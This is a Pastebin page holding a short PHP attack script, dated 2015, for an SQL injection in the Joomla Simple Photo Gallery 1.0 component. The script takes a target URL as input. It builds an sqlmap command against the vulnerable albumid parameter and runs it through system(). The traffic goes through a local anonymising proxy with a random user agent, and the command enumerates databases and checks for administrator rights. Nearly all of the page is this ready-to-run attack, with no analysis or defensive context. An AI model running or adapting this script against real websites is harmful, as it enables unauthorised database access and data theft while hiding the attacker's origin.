SHARE
TWEET

[MINI EXPLOIT] Joomla Simple Photo Gallery 1.0 - SQLI

Googleinurl Mar 16th, 2015 (edited) 14,450 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  3. # Blog:          http://blog.inurl.com.br
  4. # Twitter:       https://twitter.com/googleinurl
  5. # Fanpage:       https://fb.com/InurlBrasil
  6. # Pastebin       http://pastebin.com/u/Googleinurl
  7. # GIT:           https://github.com/googleinurl
  8. # PSS:           http://packetstormsecurity.com/user/googleinurl/
  9. # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  10. # REF:           http://www.exploit-db.com/exploits/36385/
  11. set_time_limit(0);
  12. echo "[+]  MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection\n";
  13. $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}")  : exit("\n0x[ERRO] DEFINE TARGET!\n");
  14. $command = "sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba";
  15. system($command, $dados).empty($dados[0]) ? exit() : NULL;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top